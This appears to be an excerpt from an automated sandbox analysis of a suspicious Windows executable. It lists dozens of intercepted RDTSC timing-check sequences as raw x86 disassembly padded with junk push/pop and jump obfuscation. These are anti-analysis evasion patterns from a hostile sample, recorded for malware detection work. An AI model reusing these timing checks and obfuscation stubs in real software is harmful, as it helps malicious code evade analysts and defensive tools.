              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BCDEE second address: 3BCDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBE80 second address: 3BBF09 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D2A63h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FBF3CD0A8A8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push eax 0x00000031 add dword ptr [ebp+122D1A1Bh], edx 0x00000037 pop ebx 0x00000038 mov bl, B7h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007FBF3CD0A8A8h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000019h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov ebx, dword ptr [ebp+122D261Bh] 0x00000061 mov eax, dword ptr [ebp+122D0621h] 0x00000067 jp 00007FBF3CD0A8ACh 0x0000006d push FFFFFFFFh 0x0000006f adc di, 30B9h 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BDECD second address: 3BDED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBF09 second address: 3BBF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEE20 second address: 3BEE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524C5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEE39 second address: 3BEEC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBF3CD0A8ADh 0x0000000e nop 0x0000000f mov ebx, 13B80B8Fh 0x00000014 push 00000000h 0x00000016 sub ebx, dword ptr [ebp+122D2AE7h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FBF3CD0A8A8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 jmp 00007FBF3CD0A8B2h 0x0000003d call 00007FBF3CD0A8B3h 0x00000042 mov dword ptr [ebp+122D23A8h], ecx 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d jmp 00007FBF3CD0A8B0h 0x00000052 pop edx 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEEC4 second address: 3BEECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366BC8 second address: 366BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FBF3CD0A8B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007FBF3CD0A8A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366BEF second address: 366BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366BF6 second address: 366BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C2500 second address: 3C251A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C251A second address: 3C2529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CD0A8ABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C2529 second address: 3C253B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF3CE524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C25FC second address: 3C2600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C1732 second address: 3C1740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C1740 second address: 3C1744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C5863 second address: 3C5872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C76D8 second address: 3C770A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF3CD0A8B8h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FBF3CD0A8ABh 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7868 second address: 3C7872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBF3CE524B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C86D4 second address: 3C8726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 call 00007FBF3CD0A8AEh 0x0000000d movzx ebx, dx 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 xor dword ptr [ebp+1246C79Eh], ecx 0x0000001a or dword ptr [ebp+124810CCh], eax 0x00000020 popad 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D23A8h], esi 0x00000029 xchg eax, esi 0x0000002a jmp 00007FBF3CD0A8B4h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jc 00007FBF3CD0A8ACh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8726 second address: 3C872A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C872A second address: 3C872F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7947 second address: 3C795F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524C4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD9D9 second address: 3CD9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007FBF3CD0A8A8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FBF3CD0A8A8h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEC9A second address: 3CECA4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF3CE524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1BAB second address: 3D1BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007FBF3CD0A8B4h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1BC6 second address: 3D1BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBF3CE524B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1BD2 second address: 3D1BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1BD6 second address: 3D1BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C8h 0x00000007 jl 00007FBF3CE524B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1BFB second address: 3D1C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FBF3CD0A8ACh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1C12 second address: 3D1C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D4A3C second address: 3D4A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF3CD0A8A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3686BF second address: 3686C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374342 second address: 374348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374348 second address: 374395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007FBF3CE524BDh 0x0000000b jmp 00007FBF3CE524C8h 0x00000010 pop edi 0x00000011 js 00007FBF3CE524C7h 0x00000017 jmp 00007FBF3CE524C1h 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jg 00007FBF3CE524B6h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361B5B second address: 361B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361B61 second address: 361B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF3CE524C0h 0x0000000a jmp 00007FBF3CE524BFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361B89 second address: 361B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361B8D second address: 361B93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DECB7 second address: 3DECE6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 push ebx 0x00000009 jno 00007FBF3CD0A8A6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007FBF3CD0A8B0h 0x0000001a push eax 0x0000001b push edx 0x0000001c jc 00007FBF3CD0A8A6h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DF2E4 second address: 3DF2F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jl 00007FBF3CE524B6h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DF2F6 second address: 3DF2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DF2FC second address: 3DF31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF3CE524C6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DF31B second address: 3DF321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DF321 second address: 3DF325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFB5F second address: 3DFB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF3CD0A8A6h 0x0000000a popad 0x0000000b jnl 00007FBF3CD0A8A8h 0x00000011 pushad 0x00000012 pushad 0x00000013 jl 00007FBF3CD0A8A6h 0x00000019 pushad 0x0000001a popad 0x0000001b jnp 00007FBF3CD0A8A6h 0x00000021 popad 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFB86 second address: 3DFB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FBF3CE524BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFB9E second address: 3DFBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFBA4 second address: 3DFBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FBF3CE524B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFBB3 second address: 3DFBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFBB7 second address: 3DFBBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFCD5 second address: 3DFCEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF3CD0A8ADh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DFCEB second address: 3DFCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF3CE524B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E2B99 second address: 3E2BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FBF3CD0A8AAh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jbe 00007FBF3CD0A8A8h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7F88 second address: 3E7F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF3CE524B6h 0x0000000a jng 00007FBF3CE524B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7F9F second address: 3E7FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7FA3 second address: 3E7FBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36512A second address: 36512E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36512E second address: 365150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FBF3CE524B8h 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B5D93 second address: 3B5D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B612D second address: 1FCABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FBF3CE524BEh 0x00000010 nop 0x00000011 push dword ptr [ebp+122D0F59h] 0x00000017 mov dword ptr [ebp+124513AAh], edx 0x0000001d call dword ptr [ebp+122D1D92h] 0x00000023 pushad 0x00000024 add dword ptr [ebp+122D22BBh], ecx 0x0000002a jmp 00007FBF3CE524C1h 0x0000002f xor eax, eax 0x00000031 sub dword ptr [ebp+122D22BBh], esi 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b cld 0x0000003c mov dword ptr [ebp+122D2104h], edi 0x00000042 mov dword ptr [ebp+122D2B37h], eax 0x00000048 mov dword ptr [ebp+122D2440h], edi 0x0000004e mov esi, 0000003Ch 0x00000053 jmp 00007FBF3CE524C9h 0x00000058 sub dword ptr [ebp+122D22BBh], ecx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007FBF3CE524C9h 0x00000067 lodsw 0x00000069 pushad 0x0000006a jmp 00007FBF3CE524C9h 0x0000006f popad 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 sub dword ptr [ebp+122D2440h], ebx 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+122D2440h], ecx 0x00000084 mov dword ptr [ebp+122D2440h], edx 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d push ecx 0x0000008e pushad 0x0000008f popad 0x00000090 pop ecx 0x00000091 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6469 second address: 3B646F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B664C second address: 3B6667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524BCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FBF3CE524B6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6C48 second address: 3B6C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6FF1 second address: 3B705D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FBF3CE524B8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edx, eax 0x00000028 lea eax, dword ptr [ebp+1248CA5Bh] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FBF3CE524B8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+122D26C1h] 0x0000004e xor ecx, 09B750DBh 0x00000054 jo 00007FBF3CE524B7h 0x0000005a cld 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B705D second address: 3B7078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B7078 second address: 3B7082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBF3CE524B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E720B second address: 3E720F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E720F second address: 3E7236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF3CE524BAh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E7236 second address: 3E724E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FBF3CD0A8B2h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E724E second address: 3E7253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE8CC second address: 3EE8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE8D5 second address: 3EE8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE8D9 second address: 3EE8E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE8E4 second address: 3EE8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF3CE524BDh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE8FA second address: 3EE90C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF3CD0A8ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EDE9C second address: 3EDEBF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF3CE524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jc 00007FBF3CE524B6h 0x00000011 pop edx 0x00000012 jmp 00007FBF3CE524BEh 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EDEBF second address: 3EDEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE164 second address: 3EE169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE169 second address: 3EE16F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE16F second address: 3EE185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524C2h 0x00000009 rdtsc
